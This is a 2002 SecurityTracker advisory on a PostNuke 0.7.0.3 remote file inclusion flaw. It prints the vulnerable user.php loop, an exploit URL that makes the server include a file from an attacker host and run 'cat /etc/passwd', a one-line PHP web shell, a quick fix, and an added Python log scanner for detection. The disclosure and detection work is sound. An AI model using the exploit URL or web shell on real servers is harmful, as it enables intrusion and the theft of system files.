SecurityTracker.com
SecurityTracker
Archives







Category:  Application (Forum/Board/Portal)  >  PostNuke
Vendors:  [Multiple Authors/Vendors]
PostNuke 'user.php' Flaw Lets Remote Users Specify a Remote Server Path for the $caselist Variable, Allowing Arbitrary Code to Be Executed on the PostNuke Server
Date:  Mar 29 2002
Impact:  Execution of arbitrary code via network
Exploit Included:  Yes  
Version(s): 0.7.0.3
Description:  A vulnerability was reported in PostNuke. A remote user can cause arbitrary PHP code to be executed on the server.

It is reported that a remote user can exploit a bug in the file 'user.php' to add a user-supplied entry to the $caselist array. Because each entry's path is passed to include, the remote user can point it at PHP code hosted on a remote server, and that code will then be executed on the target server.

The flaw is reported to be on line 107:

foreach ($caselist as $k=>$v)
{
$ModName = $v['module'];
include "$v[path]/$k";
}
$caselist = array();

A remote user can use the following type of URL to trigger the flaw:

http://[targethost]/user.php?caselist[bad_file.txt][path]=http://bad_host&command=cat%20/etc/passwd

In the above example, the following type of code is required on the malicious server ('bad_host'):

-- start bad_file.txt -----
<pre>
<?php
system($command);
?>
-- end bad_file.txt -----

Impact:  A remote user can cause arbitrary PHP code to be executed by the server.
Solution:  No solution was available at the time of this entry.

The author of the report has provided the following quick fix:

put on line 28 :
$caselist = array();

Vendor URL:  www.postnuke.com/
Cause:  Input validation error
Underlying OS:  Linux (Any), UNIX (Any)
Reported By:  pokleyzz sakamaniaka <pokleyzz@hotmail.com>
Message History:   None.
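
For defenders reviewing web server logs, the request form shown above can be detected as follows. This is an added example, not part of the original advisory or of PostNuke; the log lines are constructed samples, the function names are hypothetical, and it assumes $caselist is never a legitimate request parameter, as the quick fix implies.

```python
import re
from urllib.parse import parse_qsl

# Parameter name of the form caselist[<key>][path], as in the advisory's URL.
CASELIST_PATH = re.compile(r"^caselist\[[^\]]*\]\[path\]$", re.IGNORECASE)
# Value that names a remote resource (scheme://... or //host) rather than a local directory.
REMOTE_VALUE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:)?//", re.IGNORECASE)
# Request line inside a Common/Combined Log Format entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP addresses, placeholder hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Mar/2002:10:00:01 +0000] "GET /user.php?op=login HTTP/1.0" 200 5120',
    '192.0.2.77 - - [29/Mar/2002:10:00:05 +0000] "GET /user.php?caselist[bad_file.txt][path]'
    '=http://bad_host&command=cat%20/etc/passwd HTTP/1.0" 200 742',
    '192.0.2.77 - - [29/Mar/2002:10:00:09 +0000] "GET /user.php?caselist%5Bx%5D%5Bpath%5D'
    '=modules HTTP/1.0" 200 5120',
]


def check_request(target):
    """Return (kind, name, value) findings for one request target (path?query)."""
    findings = []
    query = target.partition("?")[2]
    # parse_qsl percent-decodes names and values, so caselist%5Bx%5D%5Bpath%5D is caught too.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if not name.lower().startswith("caselist"):
            continue
        # Any request-supplied caselist entry is suspicious; a [path] that
        # points at a remote resource matches the advisory's include flaw.
        remote = CASELIST_PATH.match(name) and REMOTE_VALUE.match(value)
        findings.append(("remote-include" if remote else "caselist-injection", name, value))
    return findings


def scan(lines):
    """Yield (line_number, finding) for every suspicious access-log line."""
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            for finding in check_request(match.group(1)):
                yield number, finding


if __name__ == "__main__":
    for number, finding in scan(SAMPLE_LOG):
        print(number, *finding)
```

Access logs in this format record only the request line, so the check covers query-string requests like the one in the advisory.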


 Source Message Contents

Date:  28 Mar 2002 01:03:21 -0000
From:  pokleyzz sakamaniaka <pokleyzz@hotmail.com>
Subject:  postnuke v 0.7.0.3 remote command execution

 



PostNuke is one of the popular content management
systems written in PHP. There is a bug in file user.php,
line 107,
by which a user can append to the $caselist array with their own
value.

foreach ($caselist as $k=>$v)
{
    $ModName = $v['module'];
    include "$v[path]/$k";
}
$caselist = array();

http://lame_host/user.php?caselist[bad_file.txt][path]=http://bad_host&command=cat%20/etc/passwd

bad_file.txt (put in bad_host document root):

-- start bad_file.txt -----
<pre>
<?php 
system($command);
?>
-- end bad_file.txt -----

quick fix: 
put on line 28 :
$caselist = array();

http://inetd-secure.net/
http://www.mybsd.org.my/pokleyzz/


 



Copyright 2002, SecurityGlobal.net LLC